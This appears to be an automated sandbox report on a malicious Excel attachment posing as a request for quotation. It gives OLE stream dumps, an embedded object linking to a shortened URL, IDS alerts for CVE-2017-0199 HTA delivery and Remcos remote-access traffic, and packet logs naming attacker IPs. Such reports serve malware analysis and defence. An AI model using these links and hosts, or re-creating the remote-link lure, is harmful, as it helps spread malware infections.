                                              SSDEEP:3072:EXINLfSaEZsdsqLG5M3x5XRSfZjMtY0ZXXBg7zXWX8l3PKr99g3T0:E4ZfS1K9LG54x5XRsGy0/Ozfl49
                                              TLSH:BA0402A53012E584C602A1B1CED5D1DB6B20FE62AE82CB5B396BBF1F697D502D707306
                                              File Content Preview:........................>...................................'...................j..............................................................................................................................................................................

                                              File Icon

                                              Icon Hash:2562ab89a7b7bfbf

                                              Static OLE Info

                                              General

                                              Document Type:OLE
                                              Number of OLE Files:1

                                              OLE File "RFQ_0230909024SEPT.xla.xlsx"

                                              Indicators
                                              Has Summary Info:
                                              Application Name:Microsoft Excel
                                              Encrypted Document:True
                                              Contains Word Document Stream:False
                                              Contains Workbook/Book Stream:True
                                              Contains PowerPoint Document Stream:False
                                              Contains Visio Document Stream:False
                                              Contains ObjectPool Stream:False
                                              Flash Objects Count:0
                                              Contains VBA Macros:True
                                              Summary
                                              Code Page:1252
                                              Author:
                                              Last Saved By:
                                              Create Time:2006-09-16 00:00:00
                                              Last Saved Time:2024-09-09 06:52:02
                                              Creating Application:Microsoft Excel
                                              Security:1
                                              Document Summary
                                              Document Code Page:1252
                                              Thumbnail Scaling Desired:False
                                              Contains Dirty Links:False
                                              Shared Document:False
                                              Changed Hyperlinks:False
                                              Application Version:786432

                                              Streams with VBA

                                              VBA File Name: Sheet1.cls, Stream Size: 977
                                              General
                                              Stream Path:_VBA_PROJECT_CUR/VBA/Sheet1
                                              VBA File Name:Sheet1.cls
                                              Stream Size:977
                                              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . - . 0
                                              Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 2a 92 a4 df 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                              VBA Code
                                              Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

                                              VBA File Name: Sheet2.cls, Stream Size: 977
                                              General
                                              Stream Path:_VBA_PROJECT_CUR/VBA/Sheet2
                                              VBA File Name:Sheet2.cls
                                              Stream Size:977
                                              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * m . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . - .
                                              Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 2a 92 db 6d 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                              VBA Code
                                              Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

                                              VBA File Name: Sheet3.cls, Stream Size: 977
                                              General
                                              Stream Path:_VBA_PROJECT_CUR/VBA/Sheet3
                                              VBA File Name:Sheet3.cls
                                              Stream Size:977
                                              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * D 7 . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . -
                                              Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 2a 92 44 37 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                              VBA Code
                                              Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

                                              VBA File Name: ThisWorkbook.cls, Stream Size: 985
                                              General
                                              Stream Path:_VBA_PROJECT_CUR/VBA/ThisWorkbook
                                              VBA File Name:ThisWorkbook.cls
                                              Stream Size:985
                                              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . n . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 1 . 9 . -
                                              Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 2a 92 0d 6e 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                              VBA Code
                                              Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

                                              Streams

                                              Stream Path: \x1CompObj, File Type: data, Stream Size: 114
                                              General
                                              Stream Path:\x1CompObj
                                              CLSID:
                                              File Type:data
                                              Stream Size:114
                                              Entropy:4.25248375192737
                                              Base64 Encoded:True
                                              Data ASCII:. . . . . . . . . . . . . . . . . . . F & . . . M i c r o s o f t O f f i c e E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . 9 q . . . . . . . . . . . .
                                              Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 26 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                              Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 244
                                              General
                                              Stream Path:\x5DocumentSummaryInformation
                                              CLSID:
                                              File Type:data
                                              Stream Size:244
                                              Entropy:2.889430592781307
                                              Base64 Encoded:False
                                              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , 0 . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . X . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S h e e t 1 . . . . . S h e e t 2 . . . . . S h e e t 3 . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . .
                                              Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 c4 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 17 00 00 00 50 00 00 00 0b 00 00 00 58 00 00 00 10 00 00 00 60 00 00 00 13 00 00 00 68 00 00 00 16 00 00 00 70 00 00 00 0d 00 00 00 78 00 00 00 0c 00 00 00 a1 00 00 00 02 00 00 00 e4 04 00 00
                                              Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 200
                                              General
                                              Stream Path:\x5SummaryInformation
                                              CLSID:
                                              File Type:data
                                              Stream Size:200
                                              Entropy:3.2241247550157985
                                              Base64 Encoded:False
                                              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . T . . . . . . . ` . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . | . # . @ . . . . . . . . . . . . . . . .
                                              Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 98 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 54 00 00 00 12 00 00 00 60 00 00 00 0c 00 00 00 78 00 00 00 0d 00 00 00 84 00 00 00 13 00 00 00 90 00 00 00 02 00 00 00 e4 04 00 00 1e 00 00 00 04 00 00 00
                                              Stream Path: MBD000E0291/\x1CompObj, File Type: data, Stream Size: 99
                                              General
                                              Stream Path:MBD000E0291/\x1CompObj
                                              CLSID:
                                              File Type:data
                                              Stream Size:99
                                              Entropy:3.631242196770981
                                              Base64 Encoded:False
                                              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . ! . . . M i c r o s o f t O f f i c e E x c e l W o r k s h e e t . . . . . E x c e l M L 1 2 . . . . . 9 q . . . . . . . . . . . .
                                              Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 21 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 57 6f 72 6b 73 68 65 65 74 00 0a 00 00 00 45 78 63 65 6c 4d 4c 31 32 00 00 00 00 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                              Stream Path: MBD000E0291/Package, File Type: Microsoft Excel 2007+, Stream Size: 17996
                                              General
                                              Stream Path:MBD000E0291/Package
                                              CLSID:
                                              File Type:Microsoft Excel 2007+
                                              Stream Size:17996
                                              Entropy:7.616402050559727
                                              Base64 Encoded:True
                                              Data ASCII:P K . . . . . . . . . . ! . D . 2 . . . . . . . . . . [ C o n t e n t _ T y p e s ] . x m l . . ( . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                              Data Raw:50 4b 03 04 14 00 06 00 08 00 00 00 21 00 44 19 a7 ee 32 01 00 00 c9 02 00 00 13 00 08 02 5b 43 6f 6e 74 65 6e 74 5f 54 79 70 65 73 5d 2e 78 6d 6c 20 a2 04 02 28 a0 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                              Stream Path: MBD000E0292/\x1Ole, File Type: data, Stream Size: 406
                                              General
                                              Stream Path:MBD000E0292/\x1Ole
                                              CLSID:
                                              File Type:data
                                              Stream Size:406
                                              Entropy:6.530118727485162
                                              Base64 Encoded:False
                                              Data ASCII:. . . . O . . W A . . . . . . . . . . . . . . . . y . . . K . . . . . h . t . t . p . s . : . / . / . z . e . e . p . . . l . y . / . y . D . f . v . h . . . . > . . $ k 0 . q . 3 C Q , . I . @ G h h w . . \\ . k < 7 Y . S , . C . s s * 1 . . 2 . I . | - e Q . . ~ ( S U s q . f = . @ * , V ` & 3 V m . 5 B 4 z ? . : 1 . g . g 7 : ? x } w g s . f . $ n . . . . l . C 2 N . . p . . ] . ] v m H G 2 . h G ( . 3 C . . J v ? v . g . v w . . . . . . . . . . . . . . . . . . . . s . q . 4 . z . d . 3 . t . p . S . p .
                                              Data Raw:01 00 00 02 b1 4f 02 0a 9d 57 d1 41 00 00 00 00 00 00 00 00 00 00 00 00 1a 01 00 00 e0 c9 ea 79 f9 ba ce 11 8c 82 00 aa 00 4b a9 0b 16 01 00 00 68 00 74 00 74 00 70 00 73 00 3a 00 2f 00 2f 00 7a 00 65 00 65 00 70 00 2e 00 6c 00 79 00 2f 00 79 00 44 00 66 00 76 00 68 00 00 00 cd 13 3e 17 a3 09 24 ab 8b 8a 6b b5 8c 8e 30 1a a3 71 a2 bb 03 33 43 c7 51 ba 2c e8 e3 0b 49 95 0b 95 95 40
                                              Stream Path: Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 150274
                                              General
                                              Stream Path:Workbook
                                              CLSID:
                                              File Type:Applesoft BASIC program data, first line number 16
                                              Stream Size:150274
                                              Entropy:7.995643972011389
                                              Base64 Encoded:True
                                              Data ASCII:. . . . . . . . . . . . . . . . . / . 6 . . . . . . . . @ . . n . + w . ? . # A [ p n f . $ M . = 3 . 9 @ . . . . . . . . . . . ] D . . . \\ . p . . " % . . . . I " v . . > . J c . & @ W p . } a R [ g ~ . P e . Q p . O ( ( ! . M . . . ] . c D v T . . . e . I B . . . = ; a . . . G . . . = . . . x } . . . . / | g h x w . . c . . . d . . . . . . . . . . . . . C b . . . - . . . . { j = . . . R b N . . w p $ \\ . } @ . . . . . . . . " . . . J . . . . p . . . , . . . k 1 . . . / R . f . ^ s g & . . . c . 1 . . .
                                              Data Raw:09 08 10 00 00 06 05 00 ab 1f cd 07 c1 00 01 00 06 04 00 00 2f 00 36 00 01 00 01 00 01 00 05 40 09 e8 04 fa ba 6e 86 09 bf a5 d3 2b f4 77 b0 19 3f 06 23 41 bf 5b 70 f1 6e 66 08 24 98 4d 13 3d ba ef 89 33 00 d3 de fb aa 39 40 14 a0 82 87 00 00 00 e1 00 02 00 b0 04 c1 00 02 00 5d 44 e2 00 00 00 5c 00 70 00 18 22 e6 25 9a 0d 90 f7 be 09 0b d4 9f 49 22 d0 76 bd 9e 9f a1 fd 9a af dd df
                                              Stream Path: _VBA_PROJECT_CUR/PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 525
                                              General
                                              Stream Path:_VBA_PROJECT_CUR/PROJECT
                                              CLSID:
                                              File Type:ASCII text, with CRLF line terminators
                                              Stream Size:525
                                              Entropy:5.291855604435296
                                              Base64 Encoded:True
                                              Data ASCII:I D = " { 8 E D 8 E D A 6 - 8 1 8 A - 4 1 8 B - 9 B 8 3 - 4 C C 4 5 E D D F D 5 7 } " . . D o c u m e n t = T h i s W o r k b o o k / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 1 / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 2 / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 3 / & H 0 0 0 0 0 0 0 0 . . N a m e = " V B A P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " 7 7 7 5 4 5 4 D C 5 D D A B E 1 A
                                              Data Raw:49 44 3d 22 7b 38 45 44 38 45 44 41 36 2d 38 31 38 41 2d 34 31 38 42 2d 39 42 38 33 2d 34 43 43 34 35 45 44 44 46 44 35 37 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 57 6f 72 6b 62 6f 6f 6b 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 31 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 32 2f 26 48 30 30 30
                                              Stream Path: _VBA_PROJECT_CUR/PROJECTwm, File Type: data, Stream Size: 104
                                              General
                                              Stream Path:_VBA_PROJECT_CUR/PROJECTwm
                                              CLSID:
                                              File Type:data
                                              Stream Size:104
                                              Entropy:3.0488640812019017
                                              Base64 Encoded:False
                                              Data ASCII:T h i s W o r k b o o k . T . h . i . s . W . o . r . k . b . o . o . k . . . S h e e t 1 . S . h . e . e . t . 1 . . . S h e e t 2 . S . h . e . e . t . 2 . . . S h e e t 3 . S . h . e . e . t . 3 . . . . .
                                              Data Raw:54 68 69 73 57 6f 72 6b 62 6f 6f 6b 00 54 00 68 00 69 00 73 00 57 00 6f 00 72 00 6b 00 62 00 6f 00 6f 00 6b 00 00 00 53 68 65 65 74 31 00 53 00 68 00 65 00 65 00 74 00 31 00 00 00 53 68 65 65 74 32 00 53 00 68 00 65 00 65 00 74 00 32 00 00 00 53 68 65 65 74 33 00 53 00 68 00 65 00 65 00 74 00 33 00 00 00 00 00
                                              Stream Path: _VBA_PROJECT_CUR/VBA/_VBA_PROJECT, File Type: data, Stream Size: 2644
                                              General
                                              Stream Path:_VBA_PROJECT_CUR/VBA/_VBA_PROJECT
                                              CLSID:
                                              File Type:data
                                              Stream Size:2644
                                              Entropy:3.9810373578775673
                                              Base64 Encoded:False
                                              Data ASCII:a . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 0 . # . 9 . # . C . : . \\ . P . R . O . G . R . A . ~ . 2 . \\ . C . O . M . M . O . N . ~ . 1 . \\ . M . I . C . R . O . S . ~ . 1 . \\ . V . B . A . \\ . V . B . A . 6 . \\ . V . B . E . 6 . . . D . L . L . # . V . i . s . u . a . l . . B . a . s . i . c . . F . o . r .
                                              Data Raw:cc 61 88 00 00 01 00 ff 09 40 00 00 09 04 00 00 e4 04 01 00 00 00 00 00 00 00 00 00 01 00 04 00 02 00 fa 00 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 30 00 23 00
                                              Stream Path: _VBA_PROJECT_CUR/VBA/dir, File Type: data, Stream Size: 553
                                              General
                                              Stream Path:_VBA_PROJECT_CUR/VBA/dir
                                              CLSID:
                                              File Type:data
                                              Stream Size:553
                                              Entropy:6.374373352731627
                                              Base64 Encoded:True
                                              Data ASCII:. % . . . . . . . . 0 * . . . . p . . H . . . . d . . . . . . . V B A P r o j e c t . . 4 . . @ . . j . . . = . . . . r . . . . . . . . . h . . . . J < . . . . . r s t d o l e > . . . s . t . d . o . l . e . . . h . % . ^ . . * \\ G { 0 0 0 2 0 4 3 0 - . . . . . C . . . . . . 0 0 4 . 6 } # 2 . 0 # 0 . # C : \\ W i n d . o w s \\ S y s W O W 6 4 \\ . e 2 . . t l b # O L E . A u t o m a t i . o n . ` . . E O f f D i c E O . f . i . c E . . E . 2 D F 8 D 0 4 C . - 5 B F A - 1 0 1 B - B D E 5 E A A C 4 . 2 E .
                                              Data Raw:01 25 b2 80 01 00 04 00 00 00 01 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e4 04 04 00 0a 00 1c 00 56 42 41 50 72 6f 6a 65 88 63 74 05 00 34 00 00 40 02 14 6a 06 02 0a 3d 02 0a 07 02 72 01 14 08 05 06 12 09 02 12 86 91 ef 68 08 94 00 0c 02 4a 3c 02 0a 16 00 01 72 80 73 74 64 6f 6c 65 3e 02 19 00 73 00 74 00 64 00 6f 00 80 6c 00 65 00 0d 00 68 00 25 02 5e 00 03 2a 5c 47

                                              Network Behavior

                                              Suricata IDS Alerts

                                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                              2024-09-09T17:48:56.908349+02002024449ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl1192.168.2.2249164185.235.137.22380TCP
                                              2024-09-09T17:48:56.908351+02002024197ET EXPLOIT MSXMLHTTP Download of HTA (Observed in CVE-2017-0199)1185.235.137.22380192.168.2.2249164TCP
                                              2024-09-09T17:48:59.517853+02002024449ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl1192.168.2.2249166185.235.137.22380TCP
                                              2024-09-09T17:48:59.517862+02002024197ET EXPLOIT MSXMLHTTP Download of HTA (Observed in CVE-2017-0199)1185.235.137.22380192.168.2.2249166TCP
                                              2024-09-09T17:49:12.632846+02002049038ET MALWARE Malicious Base64 Encoded Payload In Image1207.241.227.96443192.168.2.2249168TCP
                                              2024-09-09T17:49:13.605287+02002020423ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 1 M11185.235.137.22380192.168.2.2249169TCP
                                              2024-09-09T17:49:13.605287+02002020425ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 3 M11185.235.137.22380192.168.2.2249169TCP
                                              2024-09-09T17:49:15.269324+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.2249170192.3.101.2914645TCP
                                              2024-09-09T17:49:16.723246+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.2249171192.3.101.2914645TCP
                                              2024-09-09T17:49:16.819096+02002803304ETPRO MALWARE Common Downloader Header Pattern HCa3192.168.2.2249172178.237.33.5080TCP

                                              Network Port Distribution

                                              TCP Packets

                                              TimestampSource PortDest PortSource IPDest IP
                                              Sep 9, 2024 17:48:55.145525932 CEST49163443192.168.2.2295.217.202.210
                                              Sep 9, 2024 17:48:55.145581007 CEST4434916395.217.202.210192.168.2.22
                                              Sep 9, 2024 17:48:55.145653009 CEST49163443192.168.2.2295.217.202.210
                                              Sep 9, 2024 17:48:55.150844097 CEST49163443192.168.2.2295.217.202.210
                                              Sep 9, 2024 17:48:55.150883913 CEST4434916395.217.202.210192.168.2.22
                                              Sep 9, 2024 17:48:55.833237886 CEST4434916395.217.202.210192.168.2.22
                                              Sep 9, 2024 17:48:55.833525896 CEST49163443192.168.2.2295.217.202.210
                                              Sep 9, 2024 17:48:55.837750912 CEST49163443192.168.2.2295.217.202.210
                                              Sep 9, 2024 17:48:55.837785006 CEST4434916395.217.202.210192.168.2.22
                                              Sep 9, 2024 17:48:55.838339090 CEST4434916395.217.202.210192.168.2.22
                                              Sep 9, 2024 17:48:55.838404894 CEST49163443192.168.2.2295.217.202.210
                                              Sep 9, 2024 17:48:55.905481100 CEST49163443192.168.2.2295.217.202.210
                                              Sep 9, 2024 17:48:55.951410055 CEST4434916395.217.202.210192.168.2.22
                                              Sep 9, 2024 17:48:56.250272036 CEST4434916395.217.202.210192.168.2.22
                                              Sep 9, 2024 17:48:56.250458956 CEST4434916395.217.202.210192.168.2.22
                                              Sep 9, 2024 17:48:56.250498056 CEST49163443192.168.2.2295.217.202.210
                                              Sep 9, 2024 17:48:56.250535011 CEST49163443192.168.2.2295.217.202.210
                                              Sep 9, 2024 17:48:56.250643015 CEST49163443192.168.2.2295.217.202.210
                                              Sep 9, 2024 17:48:56.250665903 CEST4434916395.217.202.210192.168.2.22
                                              Sep 9, 2024 17:48:56.250675917 CEST49163443192.168.2.2295.217.202.210
                                              Sep 9, 2024 17:48:56.250720024 CEST49163443192.168.2.2295.217.202.210
                                              Sep 9, 2024 17:48:56.268775940 CEST4916480192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:48:56.274200916 CEST8049164185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:48:56.275407076 CEST4916480192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:48:56.275407076 CEST4916480192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:48:56.280210018 CEST8049164185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:48:56.908236980 CEST8049164185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:48:56.908268929 CEST8049164185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:48:56.908297062 CEST8049164185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:48:56.908314943 CEST8049164185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:48:56.908349037 CEST4916480192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:48:56.908350945 CEST8049164185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:48:56.908366919 CEST8049164185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:48:56.908379078 CEST4916480192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:48:56.908396959 CEST4916480192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:48:56.908406019 CEST8049164185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:48:56.908409119 CEST4916480192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:48:56.908447981 CEST4916480192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:48:56.908488989 CEST8049164185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:48:56.908513069 CEST8049164185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:48:56.908535004 CEST8049164185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:48:56.908535004 CEST4916480192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:48:56.908552885 CEST4916480192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:48:56.908572912 CEST4916480192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:48:56.913536072 CEST8049164185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:48:56.913603067 CEST8049164185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:48:56.913619041 CEST8049164185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:48:56.913624048 CEST4916480192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:48:56.913644075 CEST8049164185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:48:56.913677931 CEST4916480192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:48:56.913677931 CEST4916480192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:48:56.913714886 CEST4916480192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:48:56.914771080 CEST4916480192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:48:56.993530989 CEST8049164185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:48:56.993624926 CEST4916480192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:48:56.998641014 CEST8049164185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:48:56.998667955 CEST8049164185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:48:56.998686075 CEST8049164185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:48:56.998686075 CEST4916480192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:48:56.998703003 CEST4916480192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:48:56.998719931 CEST4916480192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:48:56.998748064 CEST8049164185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:48:56.998764038 CEST8049164185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:48:56.998783112 CEST4916480192.168.2.22185.235.137.223
